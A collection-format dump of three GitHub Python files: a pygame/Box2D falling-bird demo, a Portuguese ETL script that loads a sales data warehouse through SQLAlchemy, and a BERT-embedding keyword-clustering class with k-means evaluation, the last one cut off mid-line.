+{"seq_id":"14061834488","text":"import pygame\r\nfrom Box2D.b2 import world, polygonShape, circleShape, staticBody, dynamicBody\r\nimport os\r\n\r\nTARGET_FPS = 60\r\nPPM = 20\r\nTIMESTEP = 1.0 / TARGET_FPS\r\n\r\nSCREEN_WIDTH, SCREEN_HEIGHT = 640, 400\r\n\r\nscreen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT), 0, 32)\r\npygame.display.set_caption(\"aaaa\")\r\nclock = pygame.time.Clock()\r\n\r\nworld = world(gravity=(0, -10))\r\nall_sprites = pygame.sprite.Group()\r\nground_body = world.CreateStaticBody(position=(0,0), shapes=polygonShape(box=(50, 1)))\r\n\r\ncolors = {\r\n staticBody: (255, 255, 255, 255),\r\n}\r\n\r\n\r\ndef load_image(name, color_key=None):\r\n fullname = os.path.join('data', name)\r\n try:\r\n image = pygame.image.load(fullname).convert()\r\n except pygame.error as message:\r\n print('Cannot load image:', name)\r\n raise SystemExit(message)\r\n\r\n if color_key is not None:\r\n if color_key == -1:\r\n color_key = image.get_at((0, 0))\r\n image.set_colorkey(color_key)\r\n else:\r\n image = image.convert_alpha()\r\n return image\r\n\r\n\r\ndef my_draw_polygon(polygon, body, fixture):\r\n vertices = [(body.transform * v) * PPM for v in polygon.vertices]\r\n vertices = [(v[0], SCREEN_HEIGHT - v[1]) for v in vertices]\r\n pygame.draw.polygon(screen, colors[body.type], vertices)\r\n\r\n\r\npolygonShape.draw = my_draw_polygon\r\nradius = 20\r\n\r\n\r\nclass Bird(pygame.sprite.Sprite):\r\n image = load_image(\"bird.jpg\")\r\n def __init__(self, *group):\r\n super().__init__(*group)\r\n self.radius = radius\r\n self.rect = self.image.get_rect()\r\n body = world.CreateDynamicBody(position=(20, 20))\r\n self.circle = body.CreateCircleFixture(radius=1, density=1, friction=0.3)\r\n self.rect = pygame.Rect(20, 20, 260, 260)\r\n\r\n def update(self):\r\n self.rect = self.rect.move(0, self.circle.shape.pos[1])\r\n\r\n\r\ndef my_draw_circle(circle, body, fixture):\r\n position = body.transform * circle.pos * PPM\r\n position = (position[0], SCREEN_HEIGHT - position[1])\r\n circle.rect.draw()\r\n\r\n\r\ncircleShape.draw = my_draw_circle\r\n\r\nBird(all_sprites)\r\nrunning = True\r\n\r\nwhile running:\r\n for event in pygame.event.get():\r\n if event.type == pygame.QUIT:\r\n running = False\r\n screen.fill(\"black\")\r\n for body in world.bodies:\r\n for fixture in body.fixtures:\r\n fixture.shape.draw(body, fixture)\r\n world.Step(TIMESTEP, 10, 10)\r\n pygame.display.flip()\r\n clock.tick(TARGET_FPS)","repo_name":"msibir/pygameproject","sub_path":"box2d.py","file_name":"box2d.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"73291064902","text":"import collections\nfrom doctest import testfile\nfrom itertools import count\nimport re\nimport string\nfrom traceback import print_tb\nfrom turtle import home\nimport turtle\nfrom unittest import result\nfrom xml.dom.minidom import Notation\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy import delete\nfrom sqlalchemy import text\nimport sqlalchemy as sa\nfrom time import perf_counter\nimport time\nfrom datetime import date, datetime, timedelta\nimport timeit\nfrom Entidades import cliente,fornecedores,itensNota,itensPedido,notaFiscais,parcelas,pedidos,produtos,dmCliente,dmFornecedores,dmProdutos,dmTempo,dmTipoVendas,ftImpontualidades,ftVendas\nfrom Entidades.tempo import Tempo\nfrom conection import connect_db\n\nengine = connect_db()\nmetadata = sa.MetaData(bind=None)\n\n#Tabelas\ntable_clientes = sa.Table('CLIENTES', metadata, autoload=True, autoload_with=engine)\ntable_fornecedores = sa.Table('FORNECEDORES', metadata, autoload=True, autoload_with=engine)\ntable_itensNota = sa.Table('ITENS_DE_NOTA', metadata, autoload=True, autoload_with=engine)\ntable_itensPedido = sa.Table('ITENS_DE_PEDIDO', metadata, autoload=True, autoload_with=engine)\ntable_notasFiscais = sa.Table('NOTAS_FISCAIS', metadata, autoload=True, autoload_with=engine)\ntable_parcelas = sa.Table('PARCELAS', metadata, autoload=True, autoload_with=engine)\ntable_pedidos = sa.Table('PEDIDOS', metadata, autoload=True, autoload_with=engine)\ntable_produtos = sa.Table('PRODUTOS', metadata, autoload=True, autoload_with=engine)\n\ndm_clientes= sa.Table('DM_CLIENTES', metadata, autoload=True, autoload_with=engine)\ndm_fornecedores = sa.Table('DM_FORNECEDORES', metadata, autoload=True, autoload_with=engine)\ndm_produtos = sa.Table('DM_PRODUTOS', metadata, autoload=True, autoload_with=engine)\ndm_tempo = sa.Table('DM_TEMPO', metadata, autoload=True, autoload_with=engine)\ndm_tipos_vendas = sa.Table('DM_TIPOS_VENDAS', metadata, autoload=True, autoload_with=engine)\nft_impontualidade = sa.Table('FT_IMPONTUALIDADE', metadata, autoload=True, autoload_with=engine)\nft_vendas = sa.Table('FT_VENDAS', metadata, autoload=True, autoload_with=engine)\n\ndef Exclude():\n start = timeit.default_timer() \n print(\"Iniciando limpeza da base de dados!\")\n engine.execute(text('DELETE ft_vendas'))\n engine.execute(text('DELETE ft_impontualidade'))\n engine.execute(text('DELETE dm_clientes'))\n engine.execute(text('DELETE dm_fornecedores'))\n engine.execute(text('DELETE dm_produtos'))\n engine.execute(text('DELETE dm_tempo'))\n engine.execute(text('DELETE dm_tipos_vendas'))\n end = timeit.default_timer()\n r = (end - start)\n print(f\"Tempo total da execução: {r} segundos\")\n\n#EXTRAIR \n\ndef ExtractCliente():\n cli = []\n count = 0\n print(\"Iniciando extração de Cliente\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_clientes])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n cli.append(cliente.Clietes(row[0],row[1],row[2],row[3],row[4]))\n count += 1\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Clientes\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return cli\n\ndef ExtractFornecedores():\n forn = []\n count = 0\n print(\"Iniciando extração de Fornecedores\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_fornecedores])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n forn.append(fornecedores.Fornecedores(row[0],row[1],row[2],row[3]))\n count += 1\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Fornecedores\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return forn\n\ndef ExtractItensNotas():\n inot = []\n count = 0\n print(\"Iniciando extração dos Itens Notas\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_itensNota])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n inot.append(itensNota.ItensNota(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Itens notas\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return inot\n\ndef ExtractItensPedido():\n iped = []\n count = 0\n print(\"Iniciando extração dos Itens pedido\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_itensPedido])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n iped.append(itensNota.ItensNota(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Itens pedido\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return iped\n\ndef ExtractNotasFiscais():\n nf = []\n count = 0\n print(\"Iniciando extração das Notas ficais\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_notasFiscais])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n nf.append(notaFiscais.NotasFiscais(row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7],row[8],row[9]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção das Notas ficais\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return nf\n\ndef ExtractParcelas():\n parc = []\n count = 0\n print(\"Iniciando extração das Parcelas\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_parcelas])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n parc.append(parcelas.Parcelas(row[0],row[1],row[2],row[3]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção das Parcelas\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return parc\n\ndef ExtractPedidos():\n ped = []\n count = 0\n print(\"Iniciando extração dos Pedidos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_pedidos])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n ped.append(pedidos.Pedidos(row[0],row[1],row[2],row[3],row[4],row[5],row[6],row[7]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Pedidos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return ped\n\ndef ExtractProdutos():\n prod = []\n count = 0\n print(\"Iniciando extração dos Prodtos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_produtos])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n prod.append(produtos.Produtos(row[0],row[1],row[2],row[3],row[4],row[5]))\n count += 1\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Produtos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return prod\n\ndef ExtractTempo():\n temp = []\n count = 0\n print(\"Iniciando extração dos Tempos\")\n start = timeit.default_timer()\n\n stmt = sa.select([table_notasFiscais])\n result = engine.execute(stmt).fetchall()\n \n for row in result:\n temp.append(Tempo(row[7]))\n count += 1\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Fim da extrção dos Tempos\")\n print(f'Total de itens exraidos: {count}')\n print(f\"Tempo total da execução: {r} segundos\")\n \n return temp\n\n###TRANSFORMAÇÃO \n\ndef TransformarCliente():\n clientesDW = []\n print(\"Iniciando processo de transformação de Clientes\")\n start = timeit.default_timer()\n cli = ExtractCliente()\n \n \n for i in cli:\n clientesDW.append(dmCliente.DMCliente(i.cod_cli,i.nom_cli,\"Aracaju\",\"SE\"))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Clientes. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return clientesDW\n\ndef TransformarFornecedor():\n fornecedoresDW = []\n c = 0\n print(\"Iniciando processo de transformação de Fornecedores\")\n start = timeit.default_timer()\n forn = ExtractFornecedores()\n \n \n for i in forn:\n c+=1\n fornecedoresDW.append(dmFornecedores.DMFornecedores(c,i.nom_forn,i.uf_forn))\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return fornecedoresDW\n\ndef TransformarProdutos():\n produtosDW = []\n print(\"Iniciando processo de transformação de Produtos\")\n start = timeit.default_timer()\n produtos = ExtractProdutos()\n \n \n for i in produtos:\n produtosDW.append(dmProdutos.DMProdutos(i.cod_prod,i.dsc_prod,\"Teste\"))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Produtos. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return produtosDW\n\ndef TransformarTempo():\n tempoDW = []\n count = 0\n print(\"Iniciando processo de transformação de Tempo\")\n start = timeit.default_timer()\n tempo = ExtractTempo()\n \n \n for i in tempo:\n count+=1\n tempoDW.append(dmTempo.DMTempo(count,i.dat_nota.strftime(\"%Y\"),int(i.dat_nota.strftime(\"%m\")),int(i.dat_nota.strftime(\"%Y\")),i.dat_nota.strftime(\"%b\"),NomMes(int(i.dat_nota.strftime(\"%m\")))[0:3],'0000',23))\n \n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Tempo. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return tempoDW\n\ndef Turn(hora):\n turno = \"Teste\"\n h = int(hora)\n if(h < 12):\n turno = \"MANHA\"\n elif(h > 12 and h <= 18):\n turno = \"TARDE\"\n elif(h > 18):\n turno = \"NOITE\"\n return turno\n\ndef NomMes(num):\n nome = \"Teste\"\n if(num == \"01\"):\n nome = \"Janeiro\"\n elif(num == \"02\"):\n nome = \"Fevereiro\"\n elif(num == \"03\"):\n nome = \"Março\"\n elif(num == \"04\"):\n nome = \"Abril\"\n elif(num == \"05\"):\n nome = \"Maio\"\n elif(num == \"06\"):\n nome = \"Junho\"\n elif(num == \"07\"):\n nome = \"Julho\"\n elif(num == \"08\"):\n nome = \"Agosto\"\n elif(num == \"09\"):\n nome = \"Setemebro\"\n elif(num == \"10\"):\n nome = \"Outubro\"\n elif(num == \"11\"):\n nome = \"Novembro\"\n elif(num == \"12\"):\n nome = \"Dezembro\"\n \n return nome\n\ndef TransformarTipoVendas():\n tipoVendasDW = []\n cnt = 0\n print(\"Iniciando processo de transformação de Produtos\")\n start = timeit.default_timer()\n produtos = ExtractPedidos()\n \n \n for i in produtos:\n cnt+=1\n tipoVendasDW.append(dmTipoVendas.DMTiposVendas(cnt,\"a vista\" if(i.val_a_prazo == 0) else (\"a prazo\")))\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação dos Tipos de vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return tipoVendasDW\n\ndef TransformarImpontualidade():\n impotualidadeDW = []\n c = 0\n print(\"Iniciando processo de transformação de Impontualidade\")\n start = timeit.default_timer()\n tempo = ExtractTempo()\n \n \n for i in tempo:\n c+=1\n impotualidadeDW.append(ftImpontualidades.FTImpontualidades(c,c,7,8))\n \n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação de Impontualidade. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return impotualidadeDW\n\ndef TransformarVendas():\n vendasDW = []\n c = 0\n print(\"Iniciando processo de transformação de Vendas\")\n start = timeit.default_timer()\n prod = ExtractProdutos()\n \n \n for i in prod:\n c+=1\n vendasDW.append(ftVendas.FTVendas(i.cod_prod,c,c,199))\n\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de transformação de Vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \n return vendasDW\n\n###CARREGAR\n\ndef CarregarDmCliente():\n print(\"Iniciando processo de Carregamento dos Clientes\")\n start = timeit.default_timer()\n cli = TransformarCliente()\n \n for item in cli :\n ins = dm_clientes.insert().values(id_cliente = item.id_cliente, nome_cliente = item.nome_cliente, cidade_cli = item.cidade_cli, uf_cli = item.uf_cli)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Clientes. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmFornecedores():\n print(\"Iniciando processo de Carregamento dos Fornecedores\")\n start = timeit.default_timer()\n forn = TransformarFornecedor()\n \n for item in forn :\n ins = dm_fornecedores.insert().values(id_forn = item.id_forn ,nom_forn = item.nom_forn ,regiao_forn = item.regiao_forn )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmProdutos():\n print(\"Iniciando processo de Carregamento dos Produtos\")\n start = timeit.default_timer()\n prod = TransformarProdutos()\n \n for item in prod :\n ins = dm_produtos.insert().values(id_prod = item.id_prod, dsc_prod = item.dsc_prod, classe_prod = item.classe_prod )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmTempo():\n print(\"Iniciando processo de Carregamento dos Produtos\")\n start = timeit.default_timer()\n tempo = TransformarTempo()\n \n for item in tempo :\n ins = dm_tempo.insert().values(id_tempo = item.id_tempo ,nu_ano = item.nu_ano ,nu_mes= item.nu_mes,nu_anomes = item.nu_anomes,sg_mes = item.sg_mes ,nm_mesano = item.nm_mesano ,nm_mes = item.nm_mes, nu_dia = item.nu_dia)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Fornecedores. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarDmTipoVendas():\n print(\"Iniciando processo de Carregamento dos Tipos de vendas\")\n start = timeit.default_timer()\n mov = TransformarTipoVendas()\n \n for item in mov :\n ins = dm_tipos_vendas.insert().values(id_tipo_venda = item.id_tipo_venda, desc_tipo_venda = item.desc_tipo_venda)\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento dos Tipos de vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarFTImpontualidade():\n print(\"Iniciando processo de Carregamento das Impontualidades\")\n start = timeit.default_timer()\n temp = TransformarTempo() \n cli = TransformarCliente()\n \n for cliente in cli: \n for item in temp :\n ins = ft_impontualidade.insert().values(id_tempo = item.id_tempo, id_cliente = cliente.id_cliente, valor_parc_atrasadas = 156.9, valor_parc_total = 78.6 )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento das Impontualidades. \"\n f\"- Tempo de transformação: {r} segundos\")\n \ndef CarregarFTVendas():\n c = 0\n print(\"Iniciando processo de Carregamento das Vendas\")\n start = timeit.default_timer()\n temp = TransformarTempo() \n cli = TransformarProdutos()\n tpvenda = TransformarTipoVendas()\n \n for produto in cli:\n c+=1 \n for item in temp :\n for tv in tpvenda:\n ins = ft_vendas.insert().values(id_prod = produto.id_prod, id_tempo = item.id_tempo, id_tipo_venda = tv.id_tipo_venda, id_forn = c, valor_venda = 10 )\n result = engine.execute(ins)\n \n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado processo de Carregamento das Vendas. \"\n f\"- Tempo de transformação: {r} segundos\")\n\ndef ETL():\n print(\"Iniciando rotina ETL\")\n start = timeit.default_timer()\n CarregarDmCliente()\n CarregarDmFornecedores()\n CarregarDmProdutos()\n CarregarDmTempo()\n CarregarDmTipoVendas()\n CarregarFTImpontualidade()\n CarregarFTVendas()\n end = timeit.default_timer()\n r = (end - start)\n print(\"Finalizado a rotina ETL. \"\n f\"- Tempo de processamente: {r} segundos\")\n\n","repo_name":"FranciscoJSSantos/etl_vendas","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":17273,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"8"}
+{"seq_id":"32257322836","text":"import json\nfrom cv2 import split\nfrom sklearn import metrics\nfrom sklearn.cluster import KMeans,MiniBatchKMeans\nfrom sklearn.discriminant_analysis import StandardScaler\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nimport torch\nfrom tqdm import tqdm\nfrom transformers import BertModel, BertTokenizerFast\nimport scipy\nimport torch.nn.functional as F\nfrom models.MLM.utils import fineTuningDataset\nfrom torch.utils.data import DataLoader\nimport numpy as np\nimport torch.nn as nn\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport random\nimport pandas as pd \n\ndef SSE_clu(v1,v2):\n return sum(np.power(v1 - v2,2)) \n\nclass WordsCluster(object):\n def __init__(self, embedding_file, sim_threshold=0.55, del_sim_threshold=0.2, ignore_keywords=[], prep_words=[]):\n self.sim_threshold = sim_threshold\n self.del_sim_threshold = del_sim_threshold\n self.model = BertModel.from_pretrained(embedding_file)\n self.tokenizer = BertTokenizerFast.from_pretrained(embedding_file)\n self.embedding_model = self.model.get_input_embeddings()\n self.ignore_keywords = ignore_keywords\n self.prep_words = prep_words\n self.unexist = set()\n # 初始化embedding信息\n def initial_embedding_info(self, keywords):\n all_keywords_w2v_list = []\n all_keywords_embeddings = torch.tensor([])\n # get embedding of each predicate by the mean of GLOVE vectors of all triplets \n for keyword in keywords:\n with torch.no_grad():\n predicate_embedding = []\n for triplet in keywords[keyword]:\n total_embedding = []\n for w in triplet:\n input = self.tokenizer.encode(w, return_tensors=\"pt\", add_special_tokens = False)\n embedding_token = self.embedding_model(input)\n word_embedding = torch.mean(embedding_token, dim=1)\n total_embedding.append(word_embedding)\n total_embedding = torch.cat(total_embedding, dim=0)\n total_embedding = torch.sum(total_embedding, dim=0)\n total_embedding = total_embedding / len(triplet)\n predicate_embedding.append(total_embedding)\n predicate_embedding = torch.stack(predicate_embedding, dim=0)\n predicate_embedding = torch.mean(predicate_embedding, dim=0).unsqueeze(0)\n all_keywords_w2v_list.append((keyword, predicate_embedding))\n all_keywords_embeddings = torch.cat((all_keywords_embeddings, predicate_embedding), dim=0)\n self.words_w2v_dic = dict(all_keywords_w2v_list)\n return all_keywords_embeddings\n \n # 获取类标\n def get_class_represent_word(self, collection):\n if len(collection) == 0:\n return None\n if len(collection) == 1:\n return collection[0]\n # 计算模平均,求模平均w2v相似度最高词语\n sim_list = [torch.cosine_similarity(key_w2v, torch.mean(torch.stack(collection['words_w2v']), dim=0), dim=1).item() for key_w2v in collection['words_w2v']]\n max_sim = max(sim_list)\n if len(sim_list)==1:\n max_sim = sim_list[0]\n max_sim_index = sim_list.index(max_sim)\n represent_word = collection[\"words\"][max_sim_index]\n represent_word_sim = max_sim\n \n return represent_word, represent_word_sim\n \n # 过滤\n def filt_noise_words(self, collection):\n delete_noise_opinion_words_indexes = []\n scores = [np.mean(np.dot(collection['words_w2v'], x)) for x in collection['words_w2v']]\n # 根据阈值过滤类中相似度较小词\n for i in range(len(scores)):\n if scores[i] <= self.del_sim_threshold:\n delete_noise_opinion_words_indexes.append(i)\n collection['words_w2v'] = [x for (i, x) in enumerate(collection['words_w2v']) if\n i not in delete_noise_opinion_words_indexes]\n collection['words'] = [x for (i, x) in enumerate(collection['words']) if\n i not in delete_noise_opinion_words_indexes]\n # t-sne 可视化\n def t_sne_kmeans(self, words_w2v_embeddings):\n vecArr = np.array(words_w2v_embeddings) \n tsneData = TSNE().fit_transform(vecArr)\n\n #开始进行可视化\n f = plt.figure(figsize=(10,10))\n ax = plt.subplot(aspect='equal')\n sc = ax.scatter(tsneData[:,0], tsneData[:,1])\n plt.xlim(-50,50)\n plt.ylim(-50,50)\n ax.axis('off')\n ax.axis('tight')\n plt.savefig('tsne.png')\n\n # 计算欧拉距离\n def calcDis(self, dataSet, centroids, k):\n clalist=[]\n for data in dataSet:\n diff = np.tile(data, (k, 1)) - centroids #相减 (np.tile(a,(2,1))就是把a先沿x轴复制1倍,即没有复制,仍然是 [0,1,2]。 再把结果沿y方向复制2倍得到array([[0,1,2],[0,1,2]]))\n squaredDiff = diff ** 2 #平方\n squaredDist = np.sum(squaredDiff, axis=1) #和 (axis=1表示行)\n distance = squaredDist ** 0.5 #开根号\n clalist.append(distance) \n clalist = np.array(clalist) #返回一个每个点到质点的距离len(dateSet)*k的数组\n return clalist\n\n # 计算质心\n def classify(self, dataSet, centroids, k):\n # 计算样本到质心的距离\n clalist = self.calcDis(dataSet, centroids, k)\n # 分组并计算新的质心\n minDistIndices = np.argmin(clalist, axis=1) #axis=1 表示求出每行的最小值的下标\n newCentroids = pd.DataFrame(dataSet).groupby(minDistIndices).mean() #DataFramte(dataSet)对DataSet分组,groupby(min)按照min进行统计分类,mean()对分类结果求均值\n newCentroids = newCentroids.values\n \n # 计算变化量\n changed = newCentroids - centroids\n \n return changed, newCentroids\n\n\n def cluster(self, keywords, num_clusters, sim_threshold=None):\n '''\n keywords词语聚类\n :param keywords_dic:\n :return:\n '''\n result = []\n if sim_threshold is None:\n sim_threshold = self.sim_threshold\n # we collect all keywords embedding in triplet-level, and get the mean of all relevant triplets as the embedding\n all_keyfeatures = self.initial_embedding_info(keywords)\n st = StandardScaler()\n # all_keyfeatures = st.fit_transform(all_keyfeatures.numpy())\n sk_kmeans = KMeans(n_clusters=num_clusters)\n result_list = sk_kmeans.fit(all_keyfeatures)\n centroids = result_list.cluster_centers_\n closest_centroids_ids = result_list.labels_\n # centroids, closest_centroids_ids = self.train(all_keyfeatures.numpy(), num_clusters, max_iterations=10)\n # find the represented word\n cluster_dict = dict()\n for i, centroid in enumerate(centroids):\n similarity = -1\n for k in self.words_w2v_dic:\n cur_similarity = torch.cosine_similarity(torch.tensor(centroid), self.words_w2v_dic[k], dim=-1)\n if cur_similarity.item() > similarity:\n similarity = cur_similarity\n centroid_label = k\n cluster_dict[str(i)] = dict()\n cluster_dict[str(i)][\"represent_word\"] = centroid_label\n cluster_dict[str(i)][\"words\"] = []\n cluster_dict[str(i)][\"represent_word_sim\"] = similarity.item()\n for m, k in enumerate(self.words_w2v_dic):\n if closest_centroids_ids[m] == i:\n cluster_dict[str(i)][\"words\"].append(k)\n return cluster_dict\n\n \n\n def upgrade_cluster(self, keywords, collection_words_list=[], sim_threshold=None):\n if not sim_threshold:\n sim_threshold = self.sim_threshold\n for i in range(7, min(1, int(sim_threshold * 10) - 3), -1):\n collections, un_seg_words = self.cluster(keywords, collection_words_list, i * 0.1)\n keywords = un_seg_words\n collection_words_list = [x['words'] for x in collections]\n return collections, un_seg_words\n \n def sim(self, w1, w2):\n if w1 in self.embedding_model.unexist or w2 in self.unexist:\n return -1\n w1_w2v = self.embedding_model.get_word_embedding(w1)\n w2_w2v = self.embedding_model.get_word_embedding(w2)\n return np.dot(w1_w2v, w2_w2v) \n def get_embedding(self, triplet):\n total_embedding = []\n for w in triplet:\n input = self.tokenizer.encode(w, return_tensors=\"pt\", add_special_tokens = False)\n embedding_token = self.embedding_model(input)\n word_embedding = torch.mean(embedding_token, dim=1)\n total_embedding.append(word_embedding)\n total_embedding = torch.cat(total_embedding, dim=0)\n total_embedding = torch.mean(total_embedding, dim=0)\n return total_embedding \n def train(self, data, num_clusters, max_iterations):\n # data precess\n centroids=self.centroids_init(data, num_clusters)\n # print(data[0])\n #2.开始训练\n num_examples=data.shape[0]\n closest_centroids_ids=np.empty((num_examples,1))\n for i in range(max_iterations):\n # print('current iterations: ', i)\n # 得到当前每个样本到k个中心点的距离,找最近的\n closest_centroids_ids=self.centroids_find_closest(data,centroids) \n #进行中心点位置更新\n centroids=self.centroids_compute(data,closest_centroids_ids,num_clusters)\n # print(centroids)\n # print(closest_centroids_ids)\n return centroids, closest_centroids_ids\n def centroids_init(self, data, num_clusters):\n num_examples=data.shape[0]\n random_ids=np.random.permutation(num_examples) # shuffle the id and select the random centroids\n centroids=data[random_ids[:num_clusters],:]\n return centroids\n def centroids_find_closest(self,data,centroids):\n num_examples = data.shape[0]\n num_centroids = centroids.shape[0]\n closest_centroids_ids = np.zeros((num_examples,1))\n for example_index in range(num_examples) :\n distance = np.zeros((num_centroids,1))\n for centroid_index in range(num_centroids):\n distance_diff = data[example_index,:] - centroids[centroid_index,:]\n distance[centroid_index] = np.sum(distance_diff**2)\n closest_centroids_ids[example_index] = np.argmin(distance)\n return closest_centroids_ids\n def centroids_compute(self, data, closest_centroids_ids, num_clusters):\n num_features = data.shape[1]\n centroids = np.zeros((num_clusters,num_features))\n for centroid_id in range(num_clusters) :\n closest_ids = np.where(closest_centroids_ids == centroid_id)[0]\n centroids[centroid_id] = np.mean(data[closest_ids,:],axis=0)\n return centroids\n\n\n def evaluate_func(self, keywords):\n all_keyfeatures = self.initial_embedding_info(keywords)\n # ls_k = [10,20,30,40,50,60,70,80,90,100,110,120,130,140,150]\n ls_k = range(10,562,10)\n # ls_k = range(2,50)\n ls_sil = []\n ls_ch = []\n ls_elbows =[]\n ls_gs = []\n st = StandardScaler()\n all_keyfeatures = st.fit_transform(all_keyfeatures.numpy())\n for i in ls_k:\n ls_elbow = []\n \n # centroids, closest_centroids_ids = self.train(all_keyfeatures, i, max_iterations=30)\n sk_kmeans = KMeans(n_clusters=i)\n \n result_list = sk_kmeans.fit(all_keyfeatures)\n res2 = result_list.cluster_centers_\n res1 = result_list.labels_\n # res1 = closest_centroids_ids.astype(int).T.tolist()[0]###输出的是聚类类比 closest_centroids_ids\n # res2 = centroids##输出的是聚类中心 centroids\n # normalize all keyfeatures\n # ls_gs.append(self.gap(all_keyfeatures, i))\n for j in range(len(res1)):\n choose_label = res2[int(res1[j]), :]\n sse = SSE_clu(all_keyfeatures[j, :], choose_label)##肘方法\n ls_elbow.append(sse)\n # print(ls_elbow)\n ls_sil.append(metrics.silhouette_score(all_keyfeatures,res1))###轮廓系数\n ls_ch.append(metrics.calinski_harabasz_score(all_keyfeatures,res1))###CH值\n ls_elbows.append(sum(ls_elbow))\n return ls_elbows,ls_sil,ls_ch,ls_gs\n \n\n\n def sum_distance(self, data, k):\n model = KMeans(n_clusters=k)\n result_list = model.fit(data)\n res1 = result_list.labels_\n res2 = result_list.cluster_centers_\n \n disp = 0\n for m in range(data.shape[0]):\n disp += np.linalg.norm(data[m] - res2[res1[m]], axis=0)\n return disp\n\n def gap(self, data, k):\n shape = data.shape\n tops = data.max(axis=0)\n bots = data.min(axis=0)\n dists = scipy.matrix(np.diag(tops - bots)) \n rands = scipy.random.random_sample(size=(shape[0], shape[1]))\n rands = rands * dists + bots\n disp = self.sum_distance(data, k)\n refdisps = self.sum_distance(rands, k)\n gap = np.lib.scimath.log(np.mean(refdisps)) - np.lib.scimath.log(disp)\n return gap\n\n def monte_carlo(self, keywords, epochs=10):\n matx_elbows = np.mat(np.zeros((epochs, 56)))\n matx_sil = np.mat(np.zeros((epochs, 56)))\n matx_ch = np.mat(np.zeros((epochs, 56)))\n matx_gs = np.mat(np.zeros((epochs, 56)))\n for i in range(epochs):\n Repoch = self.evaluate_func(keywords)\n matx_elbows[i, :] = 